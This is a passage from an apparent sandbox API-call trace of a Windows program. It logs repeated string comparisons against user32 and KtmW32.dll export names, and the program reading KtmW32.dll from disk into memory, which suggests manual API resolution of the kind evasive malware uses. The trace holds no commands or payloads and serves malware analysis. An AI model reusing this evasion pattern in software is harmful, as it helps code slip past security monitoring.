(lpString1="BroadcastSystemMessageExW", lpString2="AppendMenuW") returned 1 [0151.082] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="ArrangeIconicWindows") returned 1 [0151.082] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AttachThreadInput") returned 1 [0151.082] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BeginDeferWindowPos") returned 1 [0151.082] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BeginPaint") returned 1 [0151.082] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BlockInput") returned 1 [0151.082] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BringWindowToTop") returned 1 [0151.082] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessage") returned 1 [0151.082] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessageA") returned 1 [0151.082] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessageExA") returned 1 [0151.082] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessageExW") returned 0 [0151.082] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="ActivateKeyboardLayout") returned 1 [0151.082] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AddClipboardFormatListener") returned 1 [0151.083] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AdjustWindowRect") returned 1 [0151.083] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AdjustWindowRectEx") returned 1 [0151.083] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AlignRects") returned 1 [0151.083] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AllowForegroundActivation") returned 1 [0151.083] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AllowSetForegroundWindow") returned 1 [0151.083] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AnimateWindow") returned 1 [0151.083] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AnyPopup") returned 1 [0151.083] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AppendMenuA") returned 1 [0151.083] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AppendMenuW") returned 1 [0151.083] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="ArrangeIconicWindows") returned 1 [0151.083] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AttachThreadInput") returned 1 [0151.083] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BeginDeferWindowPos") returned 1 [0151.083] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BeginPaint") returned 1 [0151.083] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BlockInput") returned 1 [0151.083] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BringWindowToTop") returned 1 [0151.083] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BroadcastSystemMessage") returned 1 [0151.323] GetProcessHeap () returned 0x520000 [0151.323] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x412e040 | out: hHeap=0x520000) returned 1 [0151.330] GetProcessHeap () returned 0x520000 [0151.330] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x539840 [0151.330] LoadLibraryA (lpLibFileName="KtmW32.dll") returned 0x7ffc4bf10000 [0151.334] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0151.334] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0151.334] GetModuleFileNameA (in: hModule=0x7ffc4bf10000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\KtmW32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll")) returned 0x1e [0151.335] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\KtmW32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0151.335] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0151.335] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0151.335] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=24064) returned 1 [0151.335] GetProcessHeap () returned 0x520000 [0151.335] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x5e00) returned 0x2d65030 [0151.336] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0151.416] ReadFile (in: hFile=0x17c, lpBuffer=0x2d65030, nNumberOfBytesToRead=0x5e00, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2d65030*, lpNumberOfBytesRead=0x14f5a4*=0x5e00, lpOverlapped=0x0) returned 1 [0151.417] CloseHandle (hObject=0x17c) returned 1 [0151.417] lstrcmpA (lpString1="CommitComplete", lpString2="CommitComplete") returned 0 [0151.417] lstrcmpA (lpString1="CommitEnlistment", lpString2="CommitComplete") returned 1 [0151.417] lstrcmpA (lpString1="CommitEnlistment", lpString2="CommitEnlistment") returned 0 [0151.417] lstrcmpA (lpString1="CommitTransaction", lpString2="CommitComplete") returned 1 [0151.417] lstrcmpA (lpString1="CommitTransaction", lpString2="CommitEnlistment") returned 1 [0151.417] lstrcmpA (lpString1="CommitTransaction", lpString2="CommitTransaction") returned 0 [0151.417] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitComplete") returned 1 [0151.417] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitEnlistment") returned 1 [0151.417] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitTransaction") returned 1 [0151.417] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitTransactionAsync") returned 0 [0151.417] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitComplete") returned 1 [0151.417] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitEnlistment") returned 1 [0151.417] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitTransaction") returned 1 [0151.417] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitTransactionAsync") returned 1 [0151.417] lstrcmpA (lpString1="CreateEnlistment", lpString2="CreateEnlistment") returned 0 [0151.417] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitComplete") returned 1 [0151.417] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitEnlistment") returned 1 [0151.417] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitTransaction") returned 1 [0151.417] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitTransactionAsync") returned 1 [0151.417] lstrcmpA (lpString1="CreateResourceManager", lpString2="CreateEnlistment") returned 1 [0151.417] lstrcmpA (lpString1="CreateResourceManager", lpString2="CreateResourceManager") returned 0 [0151.417] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitComplete") returned 1 [0151.417] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitEnlistment") returned 1 [0151.418] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitTransaction") returned 1 [0151.418] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitTransactionAsync") returned 1 [0151.418] lstrcmpA (lpString1="CreateTransaction", lpString2="CreateEnlistment") returned 1 [0151.418] lstrcmpA (lpString1="CreateTransaction", lpString2="CreateResourceManager") returned 1 [0151.418] lstrcmpA (lpString1="CreateTransaction", lpString2="CreateTransaction") returned 0 [0151.418] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitComplete") returned 1 [0151.418] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitEnlistment") returned 1 [0151.418] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitTransaction") returned 1 [0151.418] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitTransactionAsync") returned 1 [0151.418] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateEnlistment") returned 1 [0151.418] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateResourceManager") returned 1 [0151.418] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateTransaction") returned 1 [0151.418] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateTransactionManager") returned 0 [0151.418] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitComplete") returned 1 [0151.418] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitEnlistment") returned 1 [0151.418] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitTransaction") returned 1 [0151.418] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitTransactionAsync") returned 1 [0151.418] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateEnlistment") returned 1 [0151.418] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateResourceManager") returned 1 [0151.418] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateTransaction") returned 1 [0151.418] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateTransactionManager") returned 1 [0151.418] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="GetCurrentClockTransactionManager") returned 0 [0151.418] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitComplete") returned 1 [0151.418] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitEnlistment") returned 1 [0151.418] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitTransaction") returned 1 [0151.418] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitTransactionAsync") returned 1 [0151.418] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateEnlistment") returned 1 [0151.418] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateResourceManager") returned 1 [0151.418] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateTransaction") returned 1 [0151.418] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateTransactionManager") returned 1 [0151.418] lstrcmpA (lpString1="GetEnlistmentId", lpString2="GetCurrentClockTransactionManager") returned 1 [0151.418] lstrcmpA (lpString1="GetEnlistmentId", lpString2="GetEnlistmentId") returned 0 [0151.418] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitComplete") returned 1 [0151.419] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitEnlistment") returned 1 [0151.419] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitTransaction") returned 1 [0151.419] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitTransactionAsync") returned 1 [0151.419] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateEnlistment") returned 1 [0151.419] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateResourceManager") returned 1 [0151.419] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateTransaction") returned 1 [0151.419] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateTransactionManager") returned 1 [0151.419] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="GetCurrentClockTransactionManager") returned 1 [0151.419] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="GetEnlistmentId") returned 1 [0151.419] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="GetEnlistmentRecoveryInformation") returned 0 [0151.419] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitComplete") returned 1 [0151.419] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitEnlistment") returned 1 [0151.419] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitTransaction") returned 1 [0151.419] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitTransactionAsync") returned 1 [0151.419] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateEnlistment") returned 1 [0151.419] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateResourceManager") returned 1 [0151.419] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateTransaction") returned 1 [0151.419] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateTransactionManager") returned 1 [0151.419] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetCurrentClockTransactionManager") returned 1 [0151.419] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetEnlistmentId") returned 1 [0151.419] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0151.419] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetNotificationResourceManager") returned 0 [0151.419] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitComplete") returned 1 [0151.419] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitEnlistment") returned 1 [0151.419] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitTransaction") returned 1 [0151.419] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CommitTransactionAsync") returned 1 [0151.419] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateEnlistment") returned 1 [0151.419] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateResourceManager") returned 1 [0151.419] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateTransaction") returned 1 [0151.419] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="CreateTransactionManager") returned 1 [0151.420] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetCurrentClockTransactionManager") returned 1 [0151.420] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetEnlistmentId") returned 1 [0151.420] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0151.420] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetNotificationResourceManager") returned 1 [0151.420] lstrcmpA (lpString1="GetNotificationResourceManagerAsync", lpString2="GetNotificationResourceManagerAsync") returned 0 [0151.420] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitComplete") returned 1 [0151.420] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitEnlistment") returned 1 [0151.420] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitTransaction") returned 1 [0151.420] lstrcmpA (lpString1="GetTransactionId", lpString2="CommitTransactionAsync") returned 1 [0151.420] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateEnlistment") returned 1 [0151.420] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateResourceManager") returned 1 [0151.420] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateTransaction") returned 1 [0151.420] lstrcmpA (lpString1="GetTransactionId", lpString2="CreateTransactionManager") returned 1 [0151.420] lstrcmpA (lpString1="GetTransactionId", lpString2="GetCurrentClockTransactionManager") returned 1 [0151.420] lstrcmpA (lpString1="GetTransactionId", lpString2="GetEnlistmentId") returned 1 [0151.420] lstrcmpA (lpString1="GetTransactionId", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0151.420] lstrcmpA (lpString1="GetTransactionId", lpString2="GetNotificationResourceManager") returned 1 [0151.420] lstrcmpA (lpString1="GetTransactionId", lpString2="GetNotificationResourceManagerAsync") returned 1 [0151.420] lstrcmpA (lpString1="GetTransactionId", lpString2="GetTransactionId") returned 0 [0151.420] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitComplete") returned 1 [0151.420] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitEnlistment") returned 1 [0151.420] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitTransaction") returned 1 [0151.420] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CommitTransactionAsync") returned 1 [0151.420] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateEnlistment") returned 1 [0151.420] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateResourceManager") returned 1 [0151.420] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateTransaction") returned 1 [0151.420] lstrcmpA (lpString1="GetTransactionInformation", lpString2="CreateTransactionManager") returned 1 [0151.420] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetCurrentClockTransactionManager") returned 1 [0151.420] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetEnlistmentId") returned 1 [0151.420] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0151.420] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetNotificationResourceManager") returned 1 [0151.420] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetNotificationResourceManagerAsync") returned 1 [0151.421] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetTransactionId") returned 1 [0151.421] lstrcmpA (lpString1="GetTransactionInformation", lpString2="GetTransactionInformation") returned 0 [0151.421] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitComplete") returned 1 [0151.421] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitEnlistment") returned 1 [0151.421] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitTransaction") returned 1 [0151.421] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CommitTransactionAsync") returned 1 [0151.421] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateEnlistment") returned 1 [0151.421] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateResourceManager") returned 1 [0151.421] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateTransaction") returned 1 [0151.421] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="CreateTransactionManager") returned 1 [0151.421] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetCurrentClockTransactionManager") returned 1 [0151.421] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetEnlistmentId") returned 1 [0151.421] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0151.421] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetNotificationResourceManager") returned 1 [0151.421] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetNotificationResourceManagerAsync") returned 1 [0151.421] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetTransactionId") returned 1 [0151.421] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetTransactionInformation") returned 1 [0151.421] lstrcmpA (lpString1="GetTransactionManagerId", lpString2="GetTransactionManagerId") returned 0 [0151.421] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitComplete") returned 1 [0151.421] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitEnlistment") returned 1 [0151.421] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitTransaction") returned 1 [0151.421] lstrcmpA (lpString1="OpenEnlistment", lpString2="CommitTransactionAsync") returned 1 [0151.421] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateEnlistment") returned 1 [0151.421] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateResourceManager") returned 1 [0151.421] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateTransaction") returned 1 [0151.421] lstrcmpA (lpString1="OpenEnlistment", lpString2="CreateTransactionManager") returned 1 [0151.421] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetCurrentClockTransactionManager") returned 1 [0151.421] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetEnlistmentId") returned 1 [0151.421] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0151.421] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetNotificationResourceManager") returned 1 [0151.421] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetNotificationResourceManagerAsync") returned 1 [0151.422] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetTransactionId") returned 1 [0151.422] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetTransactionInformation") returned 1 [0151.422] lstrcmpA (lpString1="OpenEnlistment", lpString2="GetTransactionManagerId") returned 1 [0151.422] lstrcmpA (lpString1="OpenEnlistment", lpString2="OpenEnlistment") returned 0 [0151.422] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitComplete") returned 1 [0151.422] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitEnlistment") returned 1 [0151.422] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitTransaction") returned 1 [0151.422] lstrcmpA (lpString1="OpenResourceManager", lpString2="CommitTransactionAsync") returned 1 [0151.422] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateEnlistment") returned 1 [0151.422] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateResourceManager") returned 1 [0151.422] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateTransaction") returned 1 [0151.422] lstrcmpA (lpString1="OpenResourceManager", lpString2="CreateTransactionManager") returned 1 [0151.422] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetCurrentClockTransactionManager") returned 1 [0151.422] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetEnlistmentId") returned 1 [0151.422] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0151.422] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetNotificationResourceManager") returned 1 [0151.422] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetNotificationResourceManagerAsync") returned 1 [0151.422] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetTransactionId") returned 1 [0151.422] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetTransactionInformation") returned 1 [0151.422] lstrcmpA (lpString1="OpenResourceManager", lpString2="GetTransactionManagerId") returned 1 [0151.422] lstrcmpA (lpString1="OpenResourceManager", lpString2="OpenEnlistment") returned 1 [0151.422] lstrcmpA (lpString1="OpenResourceManager", lpString2="OpenResourceManager") returned 0 [0151.422] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitComplete") returned 1 [0151.422] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitEnlistment") returned 1 [0151.422] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitTransaction") returned 1 [0151.422] lstrcmpA (lpString1="OpenTransaction", lpString2="CommitTransactionAsync") returned 1 [0151.422] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateEnlistment") returned 1 [0151.423] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateResourceManager") returned 1 [0151.423] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateTransaction") returned 1 [0151.423] lstrcmpA (lpString1="OpenTransaction", lpString2="CreateTransactionManager") returned 1 [0151.423] lstrcmpA (lpString1="OpenTransaction", lpString2="GetCurrentClockTransactionManager") returned 1 [0151.423] lstrcmpA (lpString1="OpenTransaction", lpString2="GetEnlistmentId") returned 1 [0151.423] lstrcmpA (lpString1="OpenTransaction", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0151.423] lstrcmpA (lpString1="OpenTransaction", lpString2="GetNotificationResourceManager") returned 1 [0151.423] lstrcmpA (lpString1="OpenTransaction", lpString2="GetNotificationResourceManagerAsync") returned 1 [0151.423] lstrcmpA (lpString1="OpenTransaction", lpString2="GetTransactionId") returned 1 [0151.423] lstrcmpA (lpString1="OpenTransaction", lpString2="GetTransactionInformation") returned 1 [0151.423] lstrcmpA (lpString1="OpenTransaction", lpString2="GetTransactionManagerId") returned 1 [0151.423] lstrcmpA (lpString1="OpenTransaction", lpString2="OpenEnlistment") returned 1 [0151.423] lstrcmpA (lpString1="OpenTransaction", lpString2="OpenResourceManager") returned 1 [0151.423] lstrcmpA (lpString1="OpenTransaction", lpString2="OpenTransaction") returned 0 [0151.423] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitComplete") returned 1 [0151.423] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitEnlistment") returned 1 [0151.423] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitTransaction") returned 1 [0151.423] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CommitTransactionAsync") returned 1 [0151.423] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateEnlistment") returned 1 [0151.423] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateResourceManager") returned 1 [0151.423] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateTransaction") returned 1 [0151.423] lstrcmpA (lpString1="OpenTransactionManager", lpString2="CreateTransactionManager") returned 1 [0151.423] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetCurrentClockTransactionManager") returned 1 [0151.423] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetEnlistmentId") returned 1 [0151.423] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0151.423] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetNotificationResourceManager") returned 1 [0151.423] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetNotificationResourceManagerAsync") returned 1 [0151.423] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetTransactionId") returned 1 [0151.423] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetTransactionInformation") returned 1 [0151.423] lstrcmpA (lpString1="OpenTransactionManager", lpString2="GetTransactionManagerId") returned 1 [0151.423] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenEnlistment") returned 1 [0151.424] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenResourceManager") returned 1 [0151.424] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenTransaction") returned 1 [0151.424] lstrcmpA (lpString1="OpenTransactionManager", lpString2="OpenTransactionManager") returned 0 [0151.424] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitComplete") returned 1 [0151.424] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitEnlistment") returned 1 [0151.424] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitTransaction") returned 1 [0151.424] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CommitTransactionAsync") returned 1 [0151.424] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateEnlistment") returned 1 [0151.424] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateResourceManager") returned 1 [0151.424] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateTransaction") returned 1 [0151.424] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="CreateTransactionManager") returned 1 [0151.424] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetCurrentClockTransactionManager") returned 1 [0151.424] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetEnlistmentId") returned 1 [0151.424] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0151.424] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetNotificationResourceManager") returned 1 [0151.424] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetNotificationResourceManagerAsync") returned 1 [0151.424] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetTransactionId") returned 1 [0151.424] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetTransactionInformation") returned 1 [0151.424] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="GetTransactionManagerId") returned 1 [0151.424] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenEnlistment") returned 1 [0151.424] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenResourceManager") returned 1 [0151.424] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenTransaction") returned 1 [0151.424] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenTransactionManager") returned 1 [0151.424] lstrcmpA (lpString1="OpenTransactionManagerById", lpString2="OpenTransactionManagerById") returned 0 [0151.424] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitComplete") returned 1 [0151.424] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitEnlistment") returned 1 [0151.424] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitTransaction") returned 1 [0151.424] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CommitTransactionAsync") returned 1 [0151.424] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateEnlistment") returned 1 [0151.425] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateResourceManager") returned 1 [0151.425] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateTransaction") returned 1 [0151.425] lstrcmpA (lpString1="PrePrepareComplete", lpString2="CreateTransactionManager") returned 1 [0151.425] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetCurrentClockTransactionManager") returned 1 [0151.425] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetEnlistmentId") returned 1 [0151.425] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetEnlistmentRecoveryInformation") returned 1 [0151.425] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetNotificationResourceManager") returned 1 [0151.425] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetNotificationResourceManagerAsync") returned 1 [0151.425] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetTransactionId") returned 1 [0151.425] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetTransactionInformation") returned 1 [0151.425] lstrcmpA (lpString1="PrePrepareComplete", lpString2="GetTransactionManagerId") returned 1 [0151.425] lstrcmpA (lpString1="PrePrepareComplete", lpString2="OpenEnlistment") returned 1 [0151.425] lstrcmpA 